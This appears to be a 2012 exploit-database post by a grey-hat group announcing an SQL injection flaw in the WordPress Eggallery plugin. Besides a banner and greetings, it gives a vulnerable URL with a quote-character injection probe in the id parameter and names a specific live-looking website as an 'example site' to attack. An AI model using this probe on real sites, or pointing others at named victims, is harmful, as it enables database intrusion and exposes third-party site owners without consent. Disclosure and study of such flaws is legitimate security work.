id: 18883
date: 06/30/2012
title: Wordpress Eggallery - SQL Injection Vulnerability
author: Dark-Puzzle
cves: 

 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
 0                                                                        1
 1                       dark-puzzle[at]live[at]fr                        0
 0               ==========================================               1
 1                 Pentesting/exploit coding/bug research                 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
         [0day Exploits]  Allah , Alwatan , Almalik .[0day Exploits]

# Exploit Title: Wordpress Eggallery - SQL Injection Vulnerability .
# Date: 30 June 2012
# Author: Dark-Puzzle
# Risk : HIGH
# Version: All Versions
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 .
--------------------------------------------------------
Vulnerability :

http://example.com/wp-content/plugins/eggallery/image.php?id=1'

Example Site :

http://reef.pantshead.com/wp-content/plugins/eggallery/image.php?id=149'


--------------------------------------------------------
Dark-Puzzle (Souhail) .
Follow me : fb.me/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members ....

GREY HAT Mercy Fr0m Morocco .



#  0day.today [2023-03-23]  #